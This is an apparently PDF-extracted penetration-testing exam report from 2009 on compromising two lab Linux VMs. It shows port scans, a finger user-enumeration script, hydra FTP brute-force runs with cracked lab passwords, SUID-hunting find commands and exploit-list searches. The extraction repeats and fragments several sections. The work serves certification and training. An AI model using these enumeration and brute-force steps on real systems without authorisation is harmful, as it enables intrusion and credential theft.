Professional Documents
Culture Documents
Certified Penetration Tester (CPT) Practical Examination Report
Certified Penetration Tester (CPT) Practical Examination Report
Certified Penetration Tester (CPT) Practical Examination Report
Matthew Tiedeman
mtiedeman@gmail.com
February 21st, 2009
Contents
1.
2.
3.
4.
Overview.......................................................................................4
Assumptions..................................................................................4
Tools.............................................................................................4
Penetration test details....................................................................5
A. Scanning...................................................................................5
i. Baseline scan of network..........................................................5
ii. Port scanning and OS fingerprinting...........................................5
iii. Service fingerprinting - TCP services.........................................7
iv. Service fingerprinting - Validation of Apache HTTP service............9
v. SNMP enumeration................................................................11
vi. Service fingerprinting - UDP services.......................................13
B. Sites used during the exploit research phase.................................14
C. Remote exploits........................................................................15
i. Research via anyside.org.........................................................15
ii. Exploits round 1.................................................................18
iii. Research via secwatch.org.....................................................19
iv. Exploits round 2.................................................................19
D. User discovery..........................................................................19
i. Abuse of finger......................................................................19
E. Brute force password guessing....................................................21
i. Discovery of password for user account..................................21
ii. Discovery of password for cptvm1 and cptvm2 accounts........23
F. Research of cptvm1 and cptvm2 hosts..........................................25
i. cptvm1.................................................................................25
ii. cptmv2................................................................................27
G. Penetration of cptvm1...............................................................29
i. Local exploit research via anyside.org.......................................29
ii. Local exploit research via secwatch.org....................................32
iii. Privilege escalation using a Kernel VMA exploit..........................33
iv. Maintaining access via creation of a new r00t account.............34
v. Gathering the shadow password file.........................................35
H. Cracking passwords of the cptvm1 host.......................................35
i. Cracking of user, cptvm1 and cptvm2................................35
I. Penetration of cptvm2................................................................36
i. Privilege escalation using a Kernel vmsplice exploit.....................36
ii. Maintaining access via creation of a new r00t account..............37
iii. Gathering the shadow password file........................................38
J. Cracking passwords of the cptvm2 host........................................39
i. Cracking of cptvm1, cptvm2, root and r00t.......................39
K. Cracking passwords of the cptvm1 host round 2.........................40
i. Cracking of root and r00t...................................................40
L. Ultimate goal............................................................................43
i. Cptvm1 and ctpvm2 hosts compromised...................................43
ii. Passwords for root accounts on cptvm1 and cptvm2...................43
M. Lessons learned.......................................................................43
i. Searching exploit sites............................................................43
ii. Attack vectors.......................................................................44
5. Appendix.....................................................................................44
A. Source code for the Kernel 2.4 VMA exploit...................................44
B. Source code for the Kernel 2.6 vmsplice exploit.............................59
1. Overview
2. Assumptions
!
3. Tools
The following tools were used during the completion of the penetration testing
practical examination.
! back|track3 Collection of penetration tester utilities.
! VMware Fusion VMware virtual host software for OSX.
! Apple OSX Host operating system used to execute VMware Fusion.
! nmap Port scanning, fingerprinting, swiss army knife utility.
! httprint HTTP fingerprinting utility.
! snmpenum.pl SNMP enumeration utility.
! vi Text editor.
! emacs A swiss army knife editor (text/source code/etc).
! gcc C, etc compiler.
! tftp Trivial File Transfer Protocol client
! ssh Secure shell client
!
!
!
!
!
!
!
!
Based upon the list of open ports, it can be concluded that cptvm1,
192.168.1.200, is most likely a server. While cptvm2, 192.168.1.104,
is most likely a client workstation.
bt live # nmap -sS -O -n -p1-65535 192.168.1.200 192.168.1.104
Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-20 12:04 GMT
Interesting ports on 192.168.1.200:
Not shown: 65517 closed ports
PORT
STATE SERVICE
7/tcp
open echo
21/tcp
open ftp
22/tcp
open ssh
23/tcp
open telnet
79/tcp
open finger
80/tcp
open http
109/tcp
open pop2
110/tcp
open pop3
111/tcp
open rpcbind
143/tcp
open imap
199/tcp
open smux
443/tcp
open https
686/tcp
open unknown
993/tcp
open imaps
995/tcp
open pop3s
6000/tcp open X11
32768/tcp open unknown
32770/tcp open sometimes-rpc3
MAC Address: 00:0C:29:27:60:0A (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS details: Linux 2.4.18 - 2.4.32 (likely embedded)
Uptime: 0.121 days (since Tue Jan 20 09:11:03 2009)
Network Distance: 1 hop
Interesting ports on 192.168.1.104:
Not shown: 65532 closed ports
PORT
STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
939/tcp open unknown
MAC Address: 00:0C:29:3B:43:BC (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.23
Uptime: 0.106 days (since Tue Jan 20 09:32:16 2009)
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 19.321 seconds
bt live # nmap -sU -T5 -n -p1-1024 192.168.1.200 192.168.1.104
Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-20 15:53 GMT
Warning: Giving up on port early because retransmission cap hit.
Stats: 0:00:20 elapsed; 0 hosts completed (2 up), 2 undergoing UDP Scan
UDP Scan Timing: About 22.18% done; ETC: 15:54 (0:01:11 remaining)
Stats: 0:00:22 elapsed; 0 hosts completed (2 up), 2 undergoing UDP Scan
UDP Scan Timing: About 24.37% done; ETC: 15:54 (0:01:09 remaining)
Stats: 0:00:22 elapsed; 0 hosts completed (2 up), 2 undergoing UDP Scan
UDP Scan Timing: About 24.89% done; ETC: 15:54 (0:01:08 remaining)
vsftpd 1.1.3
OpenSSH 3.5p1 (protocol 1.99)
Linux telnetd
Linux fingerd
Apache httpd 2.0.40 (Red Hat Linux)
ipopd 2001.78rh
2 (rpc #100000)
UW Imapd 2001.315rh
Linux SNMP multiplexer
Apache httpd 2.0.40 (Red Hat Linux)
1-2 (rpc #100011)
1 (rpc #100024)
1-3 (rpc #100005)
v. SNMP enumeration
The snmp service was identified as listening on port 199/tcp of the
cptvm1 host, 192.168.1.200. In addition, the cptvm1 host OS was
identified as Linux. With these two factors in mind, the snmpenum.pl
utility can be utilized to gather system information. Of particular
interest are the UDP services currently running on the hosts.
Along with UDP ports 7, 13, 37, 111, 123, 161, 162, 631 and 683,
various process and service information was discovered.
bt snmpenum # snmpenum.pl 192.168.1.200 public linux.txt
---------------------------------------UPTIME
---------------------------------------1 hour, 40:22.46
---------------------------------------HOSTNAME
---------------------------------------cptvm1
---------------------------------------RUNNING SOFTWARE PATHS
---------------------------------------init
keventd
kapmd
ksoftirqd_CPU0
kswapd
kscand/DMA
kscand/Normal
kscand/HighMem
bdflush
---------------------------------------RUNNING PROCESSES
---------------------------------------init
keventd
kapmd
ksoftirqd_CPU0
kswapd
kscand/DMA
kscand/Normal
kscand/HighMem
bdflush
---------------------------------------MOUNTPOINTS
---------------------------------------/
/proc/bus/usb
/boot
/dev/shm
Real Memory
Swap Space
Memory Buffers
---------------------------------------SYSTEM INFO
---------------------------------------Linux cptvm1 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686
---------------------------------------LISTENING UDP PORTS
---------------------------------------7
13
37
111
123
161
162
631
683
---------------------------------------LISTENING TCP PORTS
---------------------------------------7
21
22
23
79
80
109
110
111
From the information gathered during this step, the systems of interest are
configured as follows:
cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995,
6000, 32768, 32770
TCP services:
7/tcp
echo
21/tcp
ftp
vsftpd 1.1.3
22/tcp
ssh
OpenSSH 3.5p1 (protocol 1.99)
23/tcp
telnet
Linux telnetd
79/tcp
finger
Linux fingerd
80/tcp
http
Apache httpd 2.0.40 (Red Hat Linux)
109/tcp
POSSIBLY pop2
110/tcp
pop3
ipopd 2001.78rh
111/tcp
rpcbind
2 (rpc #100000)
143/tcp
imap
UW Imapd 2001.315rh
199/tcp
smux
Linux SNMP multiplexer
443/tcp
ssl/http
Apache httpd 2.0.40 (Red Hat Linux)
686/tcp
rquotad
1-2 (rpc #100011)
993/tcp
imaps
995/tcp
pop3s
6000/tcp
X11
32768/tcp
status
1 (rpc #100024)
32770/tcp
mountd
1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939
TCP services:
22/tcp
ssh
111/tcp
rpcbind
939/tcp
status
109/tcp
POSSIBLY pop2
110/tcp
pop3
ipopd 2001.78rh
111/tcp
rpcbind
2 (rpc #100000)
143/tcp
imap
UW Imapd 2001.315rh
199/tcp
smux
Linux SNMP multiplexer
443/tcp
ssl/http
Apache httpd 2.0.40 (Red Hat Linux)
686/tcp
rquotad
1-2 (rpc #100011)
993/tcp
imaps
995/tcp
pop3s
6000/tcp
X11
32768/tcp
status
1 (rpc #100024)
32770/tcp
mountd
1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
7/udp
echo
13/udp
daytime
37/udp
time (32 bits)
111/udp
rpcbind
2 (rpc #100000)
123/udp
ntp
161/udp
snmp
SNMPv1 server (public)
162/udp
snmptrap
631/udp
unknown
683/udp
rquotad
1-2 (rpc #100011)
cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939
TCP services:
22/tcp
ssh
111/tcp
rpcbind
939/tcp
status
C. Remote exploits
i. Research via anyside.org
A list of exploits was downloaded from the anyside.org web site. The
list consisted of a small description of the exploit and a link to the
source code for the exploit. A list of search items was then created
based upon the findings from the scanning phase.
$ cat ../commands/remote-search.txt
apache
finger
imap
ipop
ntp
open ssh
openssh
rpc
rpcbind
rpcmount
rpcstatus
rquota
snmp
snmptrap
telnet
vs ftp
vsftp
x11
The search items list and the exploit list were used to gain a list of
possible remote exploits for the cptvm1 host.
$ grep exploits\/remote exploits_list.txt | grep -w -i -f ../commands/remotesearch.txt | sort -u > possible_remote_200.txt
$ ll
total 1664
drwxr-xr-x
drwxr-xr-x
-rw-r--r--rw-r--r--rw-r--r--
6
16
1
1
1
matt
matt
matt
matt
matt
matt
matt
matt
matt
matt
204
544
126720
702666
9376
Feb 21 14:46 ./
Feb 21 14:46 ../
Feb 6 14:40 exploits_list.db.tgz
Sep 21 05:52 exploits_list.txt
Feb 6 14:43 possible_remote_200.txt
$ cat possible_remote_200.txt
....;http://www.anyside.org/exp/exploits/remote/09.16.MS03-039-exp.c;Remote
Windows exploit for the RPC DCOM long filename heap overflow discovered by
NSFOCUS. Related advisory
....;http://www.anyside.org/exp/exploits/remote/101_ncat.c;MailEnable , IMAP
Service, Remote Buffer Overflow Exploit v0.4
2005-06-07;http://www.anyside.org/exp/exploits/remote/2005060701.txt;IPSwitch
IMAP Server LOGON Remote Stack Overflow
2005-09-20;http://www.anyside.org/exp/exploits/remote/2005092001.txt;Mercury
Mail <= 4.01a (Pegasus) IMAP Buffer Overflow Exploit
2006-03-10;http://www.anyside.org/exp/exploits/remote/2006031002.txt;Dropbear
/ OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service
2006-03-19;http://www.anyside.org/exp/exploits/remote/2006031901.txt;Mercur
Mailserver 5.0 SP3 (IMAP) Remote Buffer Overflow Exploit
2006-03-19;http://www.anyside.org/exp/exploits/remote/2006031903.txt;Mercur
Mailserver 5.0 SP3 (IMAP) Denial of Service Exploit
2006-06-05;http://www.anyside.org/exp/exploits/remote/2006060506.txt;Linux
Kernel < 2.6.16.18 (Netfilter NAT SNMP Module) Remote DoS Exploit
2006-07-23;http://www.anyside.org/exp/exploits/remote/2006072301.txt;Apache
Tomcat < 5.5.17 Remote Directory Listing Vulnerability
2006-08-21;http://www.anyside.org/exp/exploits/remote/2006082105.txt;Apache <
1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
2006-09-11;http://www.anyside.org/exp/exploits/remote/2006091101.txt;Mercur
Mailserver 5.0 SP3 (IMAP) Remote Buffer Overflow Exploit (2)
2006-09-27;http://www.anyside.org/exp/exploits/remote/2006092701.txt;OpenSSH
<= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
2007-01-15;http://www.anyside.org/exp/exploits/remote/2007011502.txt;Mercur
Messaging 2005 IMAP Remote Buffer Overflow Exploit
2007-02-01;http://www.anyside.org/exp/exploits/remote/2007020107.txt;CA
BrightStor ARCserve 11.5.2.0 (catirpc.dll) RPC Server DoS Exploit
2007-02-23;http://www.anyside.org/exp/exploits/remote/2007022306.txt;Snort
2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow DoS Exploit
2007-03-01;http://www.anyside.org/exp/exploits/remote/2007030102.txt;Snort
2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit
2007-03-10;http://www.anyside.org/exp/exploits/remote/2007031002.txt;MS
Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption
2007-03-21;http://www.anyside.org/exp/exploits/remote/2007032101.txt;Mercur
Messaging 2005 <= SP4 IMAP Remote Exploit (egghunter mod)
2007-03-21;http://www.anyside.org/exp/exploits/remote/2007032101.txt;Mercur
Messaging 2005 IMAP (SUBSCRIBE) Remote Exploit (win2k SP4)
2007-03-24;http://www.anyside.org/exp/exploits/remote/2007032401.txt;Mercury
Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit
2007-03-30;http://www.anyside.org/exp/exploits/remote/2007033002.txt;Snort
2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit (linux)
2007-04-07;http://www.anyside.org/exp/exploits/remote/2007040701.txt;Apache
Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
2007-04-15;http://www.anyside.org/exp/exploits/remote/2007041501.txt;MS
Windows DNS RPC Remote Buffer Overflow Exploit (port 445)
2007-05-26;http://www.anyside.org/exp/exploits/remote/2007052601.txt;Apache
2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
2007-05-30;http://www.anyside.org/exp/exploits/remote/2007053001.txt;Eudora
7.1.0.9 (IMAP FLAGS) Remote SEH Overwrite Exploit 0day
2007-06-22;http://www.anyside.org/exp/exploits/remote/2007062201.txt;Apache
mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
2007-07-08;http://www.anyside.org/exp/exploits/remote/2007070801.txt;Apache
Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
2007-09-03;http://www.anyside.org/exp/exploits/remote/2007090301.txt;CCProxy
<= v6.2 Telnet Proxy Ping Overflow Exploit (meta)
2007-10-14;http://www.anyside.org/exp/exploits/remote/2007101401.txt;Apache
Tomcat (webdav) Remote File Disclosure Exploit
2007-10-21;http://www.anyside.org/exp/exploits/remote/2007102101.txt;Apache
Tomcat (webdav) Remote File Disclosure Exploit (ssl support)
2007-12-18;http://www.anyside.org/exp/exploits/remote/2007121805.txt;MS
Windows Message Queuing Service RPC BOF Exploit (MS07-065)
2008-04-04;http://www.anyside.org/exp/exploits/remote/2008040401.txt;Sun
Solaris <= 10 rpc.ypupdated Remote Root Exploit (meta)
2008-04-06;http://www.anyside.org/exp/exploits/remote/2008040601.txt;Apache
Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
2008-06-30;http://www.anyside.org/exp/exploits/remote/2008063003.txt;Surgemail
39e-1 Post Auth IMAP Remote Buffer Overflow DoS
2008-07-17;http://www.anyside.org/exp/exploits/remote/2008071701.txt;Debian
While this list looks impressive in length, removing exploits that don't
match the operating system, don't match the software installed, don't
match the proper version or don't provide a privilege escalation leaves
only 3 exploits. The
....;http://www.anyside.org/exp/exploits/remote/ADMmountd.c;ADM
mountd exploit - Linux rpc.mountd 2.2beta29 remote root exploit,
....;http://www.anyside.org/exp/exploits/remote/OpenFuckV2.c;Remo
te exploit for Apache + OpenSSL v0.9.6d and below. This exploit is
based upon the openssl-too-open exploit by Solar Eclipse and offers
more than 130 targets including various flavors of Linux. and 20050430;http://www.anyside.org/exp/exploits/remote/Snmppd.c;Snmppd
SNMP proxy daemon format string exploit exploits.
ii. Exploits round 1
The 3 exploits found were downloaded and reviewed. The following
lists the exploits in the order they were attempted (from most to least
likely to work).
!
Reviewing the code for this exploit reveals that the exploit was
written in 1998. The possibility of this exploit being successful was
deemed to be very slim. The exploit was successfully compiled
after making minor modifications to the source to fix syntax issues
due to line wrapping/formatting defects. The execution of the
exploit was unsuccessful.
iii. Research via secwatch.org
Having exhausted the exploits known to the anyside.org site, the
secwatch.org site was used to continue the search. The search results
were quite extensive compared to the anyside.org list. However, the
only additional exploit located was the UW imapd IMAP 4.1 server.
iv. Exploits round 2
After quite an extensive review of possible exploits, only one additional
exploit was located. The UW imapd IMAP 4.1 server exploit.
!
D. User discovery
i. Abuse of finger
The finger service running on port 79/tcp provides us with the ability
to brute force user names on the cptvm1 host. To accomplish this, a
shell script executing finger over a list of user names was
implemented. The list of user names was generated by googling for a
list of common user names. The VM running back|track3 did not have
a proper finger client installed so this command was executed from the
host machine under OSX.
The names of 18 users on the cptvm1 host were discovered.
Reviewing the output from the finger command reveals that of the 18
user accounts, only the root, user and postgres users have the
ability to login to a standard shell.
$ cat fingerListOfUserNames.sh
#!/bin/bash
while read userName; do
finger ${userName}@$1 >> "usersOn$1_RAW.txt"
done < $2
7
11
1
1
1
1
1
matt
matt
matt
matt
matt
matt
matt
matt
matt
matt
matt
matt
matt
matt
238
374
291
3550
107
4699
26235
Feb
Feb
Feb
Feb
Feb
Feb
Feb
11
10
11
10
11
11
11
22:23
19:12
22:06
19:31
22:06
21:46
21:46
./
../
fingerListOfUserNames.sh*
usernames.txt
usersOn192.168.1.200.txt
usersOn192.168.1.200_FOUND.txt
usersOn192.168.1.200_RAW.txt
$ cat usersOn192.168.1.200.txt
adm
apache
daemon
ftp
lp
mail
nfsnobody
nobody
nscd
operator
postgres
root
rpc
rpcuser
sshd
user
uucp
vcsa
From the information gathered during this step, the systems of interest are
configured as follows:
cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995,
6000, 32768, 32770
TCP services:
7/tcp
echo
21/tcp
ftp
vsftpd 1.1.3
22/tcp
ssh
OpenSSH 3.5p1 (protocol 1.99)
23/tcp
telnet
Linux telnetd
79/tcp
finger
Linux fingerd
80/tcp
http
Apache httpd 2.0.40 (Red Hat Linux)
109/tcp
POSSIBLY pop2
110/tcp
pop3
ipopd 2001.78rh
111/tcp
rpcbind
2 (rpc #100000)
143/tcp
imap
UW Imapd 2001.315rh
199/tcp
smux
Linux SNMP multiplexer
443/tcp
ssl/http
Apache httpd 2.0.40 (Red Hat Linux)
686/tcp
rquotad
1-2 (rpc #100011)
993/tcp
imaps
995/tcp
pop3s
6000/tcp
X11
32768/tcp
status
1 (rpc #100024)
32770/tcp
mountd
1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
7/udp
echo
13/udp
daytime
37/udp
time (32 bits)
111/udp
rpcbind
2 (rpc #100000)
123/udp
ntp
161/udp
snmp
SNMPv1 server (public)
162/udp
snmptrap
631/udp
unknown
683/udp
rquotad
1-2 (rpc #100011)
User accounts: adm, apache, daemon, ftp, lp, mail, nfsnobody, nobody, nscd,
operator, postgres, root, rpc, rpcuser, sshd, user, uucp, vcsa
cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939
TCP services:
22/tcp
ssh
111/tcp
rpcbind
939/tcp
status
session.
bt ~ # hydra -R
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-01-28 21:12:39
[DATA] 16 tasks, 1 servers, 139758 login tries (l:2/p:69879), ~8734 tries per
task
[DATA] attacking service ftp on port 21
The session file ./hydra.restore was written. Type "hydra -R" to resume
session.
bt ~ # hydra -R
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-01-28 21:12:53
[DATA] 16 tasks, 1 servers, 139758 login tries (l:2/p:69879), ~8734 tries per
task
[DATA] attacking service ftp on port 21
[STATUS] 22420.00 tries/min, 22420 tries in 00:01h, 117338 todo in 00:06h
[STATUS] 7740.67 tries/min, 23222 tries in 00:03h, 116536 todo in 00:16h
[STATUS] 3550.57 tries/min, 24854 tries in 00:07h, 114904 todo in 00:33h
[STATUS] 1873.47 tries/min, 28102 tries in 00:15h, 111656 todo in 00:60h
[STATUS] 1116.58 tries/min, 34614 tries in 00:31h, 105144 todo in 01:35h
[STATUS] 874.72 tries/min, 41112 tries in 00:47h, 98646 todo in 01:53h
[STATUS] 755.90 tries/min, 47622 tries in 01:03h, 92136 todo in 02:02h
[STATUS] 685.14 tries/min, 54126 tries in 01:19h, 85632 todo in 02:05h
[STATUS] 638.21 tries/min, 60630 tries in 01:35h, 79128 todo in 02:04h
[STATUS] 604.82 tries/min, 67135 tries in 01:51h, 72623 todo in 02:01h
[21][ftp] host: 192.168.1.200
login: cptvm1
password: windows
[STATUS] attack finished for 192.168.1.200 (valid pair found)
Hydra (http://www.thc.org) finished at 2009-01-28 23:04:25
bt ~ # hydra -e n -l cptvm2 -P passwords/passwords.txt 192.168.1.200 ftp
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-01-29 22:54:56
[DATA] 16 tasks, 1 servers, 69879 login tries (l:1/p:69879), ~4367 tries per
task
[DATA] attacking service ftp on port 21
[STATUS] 401.00 tries/min, 401 tries in 00:01h, 69478 todo in 02:54h
[STATUS] 401.00 tries/min, 1203 tries in 00:03h, 68676 todo in 02:52h
[STATUS] 403.43 tries/min, 2824 tries in 00:07h, 67055 todo in 02:47h
[STATUS] 405.00 tries/min, 6075 tries in 00:15h, 63804 todo in 02:38h
[STATUS] 405.77 tries/min, 12579 tries in 00:31h, 57300 todo in 02:22h
[STATUS] 406.02 tries/min, 19083 tries in 00:47h, 50796 todo in 02:06h
[STATUS] 406.17 tries/min, 25589 tries in 01:03h, 44290 todo in 01:50h
[STATUS] 406.22 tries/min, 32091 tries in 01:19h, 37788 todo in 01:34h
[STATUS] 406.26 tries/min, 38595 tries in 01:35h, 31284 todo in 01:18h
[STATUS] 406.28 tries/min, 45097 tries in 01:51h, 24782 todo in 01:01h
[21][ftp] host: 192.168.1.200
login: cptvm2
password: linux
[STATUS] attack finished for 192.168.1.200 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2009-01-30 00:47:01
From the information gathered during this step, the systems of interest are
configured as follows:
cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995,
6000, 32768, 32770
TCP services:
7/tcp
echo
21/tcp
ftp
vsftpd 1.1.3
22/tcp
ssh
OpenSSH 3.5p1 (protocol 1.99)
23/tcp
telnet
Linux telnetd
79/tcp
finger
Linux fingerd
80/tcp
http
Apache httpd 2.0.40 (Red Hat Linux)
109/tcp
POSSIBLY pop2
110/tcp
pop3
ipopd 2001.78rh
111/tcp
rpcbind
2 (rpc #100000)
143/tcp
imap
UW Imapd 2001.315rh
199/tcp
smux
Linux SNMP multiplexer
443/tcp
ssl/http
Apache httpd 2.0.40 (Red Hat Linux)
686/tcp
rquotad
1-2 (rpc #100011)
993/tcp
imaps
995/tcp
pop3s
6000/tcp
X11
32768/tcp
status
1 (rpc #100024)
32770/tcp
mountd
1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
7/udp
echo
13/udp
daytime
37/udp
time (32 bits)
111/udp
rpcbind
2 (rpc #100000)
123/udp
ntp
161/udp
snmp
SNMPv1 server (public)
162/udp
snmptrap
631/udp
unknown
683/udp
rquotad
1-2 (rpc #100011)
User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, ftp, games, gdm,
gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp
operator, pcap, postgres, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd
sync, user, uucp, vcsa, webalizer, xfs
Username/password: user/digital, cptvm1/windows, cptvm2/linux
cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939
TCP services:
22/tcp
ssh
OpenSSH 4.3 (protocol 2.0)
111/tcp
rpcbind
2 (rpc #100000)
939/tcp
status
1 (rpc #100024)
User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus,
distcache, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named,
news, nfsnobody, nobody, nscd, ntp, operator, pcap, root, rpc, rpcuser, rpm,
shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfs
Username/password: cptvm1/windows, cptvm2/linux
The locations of all files having read and execute permissions set for
other were gathered. This may provide the ability to read data or
execute tasks we normally should not have privileges to.
[cptvm1@cptvm1 ~ ]$ find / -type f -a -not -type l -a -perm +003 -printf "%m
%u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm003_200.txt
The locations of all files that are owned by a group we have access to
and are readable or executable were gathered. This may provide the
ability to read data or execute tasks we normally should not have
privileges to.
[cptvm1@cptvm1 ~ ]$ find / -type f -a -not -type l -a -perm +030 -a \( -group
cptvm1 -o -group cptvm2 -o -group user \) -printf "%m %u %g %h/%f\\n" >
~/find-typef-a-not-typel-a-perm030-a-groupcptvm1-ogroupcptvm2ogroupuser_200.txt
The locations of all files that are set to execute as the root user were
gathered. This will provide a list of executables that should be
researched for exploits.
[cptvm1@cptvm1 ~ ]$ find / -type f -a -not -type l -a -perm +4000 -printf "%m
%u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm4000_200.txt
The information gathered during this phase was used mainly for exploit
research.
From the information gathered during this step, the systems of interest are
configured as follows:
cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995,
6000, 32768, 32770
TCP services:
7/tcp
echo
21/tcp
ftp
vsftpd 1.1.3
22/tcp
ssh
OpenSSH 3.5p1 (protocol 1.99)
23/tcp
telnet
Linux telnetd
79/tcp
finger
Linux fingerd
80/tcp
http
Apache httpd 2.0.40 (Red Hat Linux)
109/tcp
POSSIBLY pop2
110/tcp
pop3
ipopd 2001.78rh
111/tcp
rpcbind
2 (rpc #100000)
143/tcp
imap
UW Imapd 2001.315rh
199/tcp
smux
Linux SNMP multiplexer
443/tcp
ssl/http
Apache httpd 2.0.40 (Red Hat Linux)
686/tcp
rquotad
1-2 (rpc #100011)
993/tcp
imaps
995/tcp
pop3s
6000/tcp
X11
32768/tcp
status
1 (rpc #100024)
32770/tcp
mountd
1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
7/udp
echo
13/udp
daytime
37/udp
time (32 bits)
111/udp
rpcbind
2 (rpc #100000)
123/udp
ntp
161/udp
snmp
SNMPv1 server (public)
162/udp
snmptrap
631/udp
unknown
683/udp
rquotad
1-2 (rpc #100011)
User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, ftp, games, gdm,
gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp
operator, pcap, postgres, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd
sync, user, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/sbin/suexec,
/sbin/pam_timestamp_check, /usr/bin/passwd, /usr/lib/news/bin/inndstart,
/usr/lib/news/bin/startinnfeed, /usr/lib/news/bin/rnews, /sbin/pwdb_chkpwd,
/sbin/unix_chkpwd, /usr/X11R6/bin/XFree86, /usr/bin/chfn, /usr/bin/chsh,
/usr/bin/newgrp, /usr/libexec/openssh/ssh-keysign, /usr/sbin/userhelper,
/bin/mount, /bin/ping, /bin/su, /bin/umount, /usr/bin/at, /usr/bin/chage,
/usr/bin/crontab, /usr/bin/gpasswd, /usr/bin/lppasswd, /usr/bin/rcp,
/usr/bin/rlogin, /usr/bin/rsh, /usr/sbin/ping6, /usr/sbin/traceroute,
/usr/sbin/traceroute6, /usr/sbin/userisdnctl, /usr/sbin/usernetctl
Username/password: user/digital, cptvm1/windows, cptvm2/linux
cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939
TCP services:
22/tcp
ssh
OpenSSH 4.3 (protocol 2.0)
111/tcp
rpcbind
2 (rpc #100000)
939/tcp
status
1 (rpc #100024)
User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus,
distcache, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named,
news, nfsnobody, nobody, nscd, ntp, operator, pcap, root, rpc, rpcuser, rpm,
shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfs
Username/password: cptvm1/windows, cptvm2/linux
ii. cptmv2
Various data was gathered pertaining to the kernel version and
permissions of files within the system. Items of interest were files
having permissions set to run as root, files having permissions
incorrectly set to allow anyone to read/write/execute them and files
owned by one of the accounts with a known password.
Up to this point, the specific version of the Linux kernel was not
known. To gather this information, the uname commands was used.
[cptvm1@localhost ~ ]$ uname -a
Linux localhost.localdomain 2.6.18-8.el5 #1 SMP Thu Mar 15 19:57:35 EDT 2007
i686 i686 i386 GNU/Linux
The locations of all files owned by the cptvm1 and cptvm2 accounts
The locations of all files having read and execute permissions set for
other were gathered. This may provide the ability to read data or
execute tasks we normally should not have privileges to.
[cptvm1@localhost ~ ]$ find / -type f -a -not -type l -a -perm +003 -printf
"%m %u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm003_104.txt
The locations of all files that are owned by a group we have access to
and are readable or executable were gathered. This may provide the
ability to read data or execute tasks we normally should not have
privileges to.
[cptvm1@localhost ~ ]$ find / -type f -a -not -type l -a -perm +030 -a \(
-group cptvm1 -o -group cptvm2 \) -printf "%m %u %g %h/%f\\n" > ~/find-typefa-not-typel-a-perm030-a-groupcptvm1-ogroupcptvm2_104.txt
